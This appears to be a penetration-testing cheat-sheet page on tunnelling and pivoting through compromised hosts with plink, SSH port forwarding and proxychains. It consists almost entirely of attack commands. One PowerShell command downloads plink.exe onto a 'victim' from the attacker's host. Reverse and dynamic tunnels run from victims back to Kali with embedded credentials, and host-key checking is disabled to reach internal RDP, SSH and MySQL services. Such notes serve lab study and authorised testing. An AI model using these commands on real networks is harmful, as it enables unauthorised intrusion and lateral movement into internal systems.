All Gitbook

Tunneling / (with SSH key)

Burp > proxychains > app: Settings > Network > Connections > SOCKS Proxy

sudo netstat -tulpn to check tunnel connections

plink ssh to kali from victim

#victim
netstat -ano #to see undiscovered service during nmap

#kali
python -m http.server 8080 #to host plink
service ssh start

#victim
powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.158:8080/plink.exe','C:/hfs/tmp/plink.exe')

cmd.exe /c echo y | plink.exe -ssh -l kali -pw kalipwd -R 192.168.119.158:7799:127.0.0.1:445 192.168.119.158

#kali
nmap -sT -sV -sC 127.0.0.1 7799

:445 = internal service ; :7799 = kali tunnel port to the target :445

#machine C
plink.exe -ssh -l b.user -pw b.pwd -N -R 10.1.1.9:1069:127.0.0.1:9050 10.1.1.9

#machine B 10.1.1.9
plink.exe -ssh -l kali -pw kalipwd -N -R 192.168.119.158:7799:127.0.0.1:1069 192.168.119.158

tunneling machine C :9050 to kali :7799 through machine B :1069

ssh to victim from kali

/etc/proxychains4.conf:
socks4 	127.0.0.1 9050
socks4 	127.0.0.1 9060

sudo ssh -N -D 127.0.0.1:9050 [email protected] 

sudo ssh -N -D 127.0.0.1:9060 [email protected] -p 22000 -o KexAlgorithms=+diffie-hellman-group1-sha1 -o HostKeyAlgorithms=+ssh-rsa

may use -i {cracked key id} flag if have Authorized_key cracked

or -i {authorized_key} if placed kali's key in the victim

pivot machine 8888 to windows victim 3389 (need victim pw)

ssh -L 8888:192.168.1.90:3389 [email protected] #-f bg 
( on pivot machine rdp 127.0.0.1:8888)

kali connect to pivot machine 8888 to final victim 3389

rdp 192.168.2.90:8888

ssh from victim to kali

after finding which port is opened on the next client from 1st victim 

# bind next client :22 to kali 1122, next client 3306 to kali 13306
ssh -f -N -R 1122:10.5.5.11:22 -R 13306:10.5.5.11:3306 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i /tmp/keys/id_rsa [email protected]

prevent ssh from asking for kali pwd with id_rsa

# in /tmp on 1st victim
mkdir keys
cd keys
ssh-keygen
> /tmp/keys/id_rsa
cat id_rsa.pub

cop to kali ~/.ssh/authorized_keys

dynamic port forwarding

/etc/proxychains4.conf:
socks4 	127.0.0.1 9050

ssh -f -N -R 9050 -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -i
/tmp/keys/id_rsa [email protected]

windows allowing other access local :80 

# 192.168.1.90:8080 = victim:80 (initiate from victim)
ssh -R 8080:internalwww:80 [email protected]
LogoConfigure SSH Tunnel (Port Forwarding) on Windows | Windows OS HubWindows OS Hub
PreviousPersisting access with DC admin

Last updated